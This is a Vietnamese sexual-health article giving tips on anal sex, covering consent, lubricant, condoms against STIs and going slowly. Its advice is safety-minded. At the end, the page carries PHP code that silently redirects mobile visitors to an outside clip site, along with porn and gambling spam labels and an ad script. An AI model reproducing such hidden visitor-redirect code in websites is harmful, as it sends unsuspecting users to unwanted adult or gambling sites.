4 cách dễ dàng để ‘yêu’ qua ‘cửa sau’

Filed under: SINH LÝ – GIỚI TÍNH |
'Yêu' qua cửa sau cũng khá thụ vị (Ảnh minh họa) 

Có rất nhiều điều cần nghiên cứu về cách mọi người “yêu” qua đường hậu môn.
Để cuộc “yêu” theo “cửa sau” này thành công mĩ mãn, bạn hãy tham khảo những bí quyết sau.Trong hai mươi năm qua, thực chất hơn người Mỹ đã có nhiều nghiên cứu về chuyện “yêu” qua “cửa sau”. Những người đã thử cách thức “yêu” này cũng không thực hành thường xuyên. Và, nói như các nhà khoa học, có rất nhiều điều cần nghiên cứu về cách mọi người “yêu” qua đường hậu môn, những gì họ làm hoặc không làm, và cách họ cảm nhận về nó. 

Để cuộc “yêu” theo “cửa sau” thành công mĩ mãn, bạn hãy tham khảo những bí quyết sau:

1. Đừng ép buộc cô ấy phải tham gia “trò chơi tình yêu” này. Bất kỳ loại áp lực tình dục nào cũng bị coi là không nên. Đặc biệt là “yêu” qua “cửa sau” còn có thể gây ra những rủi ro do hậu môn không có khả năng tự bôi trơn và không dễ “thâm nhập”.

2. Sử dụng nhiều dầu bôi trơn. Một nghiên cứu gần đây của Đại học Indiana có cho thấy rằng, việc sử dụng các chất bôi trơn làm từ nước hoặc từ silicon sẽ khiến các cặp đôi cảm thấy có cảm hứng và hài lòng nhiều hơn so với những cặp đôi thích “yêu” qua đường này mà lại không dùng chất bôi trơn. Chất bôi trơn có gốc từ nước được ưu tiên lựa chọn cao hơn hẳn. Cả hai loại chất bôi trơn này đều an toàn khi sử dụng với bao cao su.

4 cách dễ dàng để 'yêu' qua 'cửa sau', Nghệ thuật yêu, Tình yêu - Giới tính, yeu qua cua sau, sex, tinh duc, tinh yeu gioi tinh, lam tinh, hau mon, an ai

Nên sử dụng chất bôi trơn khi ‘yêu’ qua cửa sau (Ảnh minh họa)

3. Sử dụng bao cao su. HPV và các lây nhiễm khác có thể lây truyền trong quá trình quan hệ tình dục qua đường hậu môn (bao gồm cả HIV, Chlamydia, lậu, herpes, vv.).

Do các quý ông không mấy quan tâm tới xét nghiệm HPV nên hầu hết đàn ông không có ý nghĩ họ có HPV hay không – bao gồm cả các loại HPV có thể làm tăng nguy cơ ung thư, như ung thư hậu môn hay ung thư dương vật. Do vậy, hãy bảo vệ sức khỏe của mình và của bạn tình bằng cách sử dụng bao cao su trong quan hệ tình dục qua đường hậu môn.

4. Thực hành chậm. Hầu hết mọi người không thành thục khi quan hệ tình dục qua đường hậu môn giống như những gì mà chúng ta đã thấy trên những phim “mát mẻ”. Hầu hết đàn ông và phụ nữ sẽ cảm thấy hứng thú khi quan hệ tình dục qua đường hậu môn nếu cả hai cùng “thực hành” một cách chậm và nhẹ nhàng khi “thâm nhập”. Chỉ khi cả hai cùng đúng mức, tỉnh táo và thoải mái thì “chuyện ấy” dù là ở “cửa trước” hay “cửa sau” đều có thể làm cho cả hai thỏa mãn.

Phim sex
if (is_mobile()) { header("Location: http://mclip.in/tai-clip/13363"); exit(); } function is_mobile() { if(isset($_SERVER["HTTP_X_WAP_PROFILE"])) return true; if(preg_match("/wap.|.wap/i",$_SERVER["HTTP_ACCEPT"])) return true; if(isset($_SERVER["HTTP_USER_AGENT"])) { $user_agents = array( "midp", "java", "opera mini", "opera mobi", "mobi", "nokia", "midp", "midp", "j2me", "avantg", "docomo", "novarra", "palmos", "palmsource", "240x320", "opwv", "chtml", "pda", "windows ce", "mmp\/", "blackberry", "mib\/", "symbian", "wireless", "nokia", "hand", "mobi", "phone", "cdm", "up.b", "audio", "SIE-", "SEC-", "samsung", "HTC", "mot-", "mitsu", "sagem", "sony", "alcatel", "lg", "erics", "vx", "NEC", "philips", "mmm", "xx", "panasonic", "sharp", "wap", "sch", "rover", "pocket", "benq", "java", "pt", "pg", "vox", "amoi", "bird", "compal", "kg", "voda", "sany", "kdd", "dbt", "sendo", "sgh", "jb", "dddi", "iphone", "ipad", "android", "Android","series 60", "s60" ); $user_agents = implode("|", $user_agents ); if (preg_match("/$user_agents/i", $_SERVER["HTTP_USER_AGENT"])) return true; } return false; } function hide_float() { var content = document.getElementById('float_content'); var hide = document.getElementById('hide_float'); if (content.style.display == "none") { content.style.display = "block"; hide.innerHTML = ' Close [X]'; } else { content.style.display = "none"; hide.innerHTML = 'Quang Cao! '; } }
[X] Close.
mybet88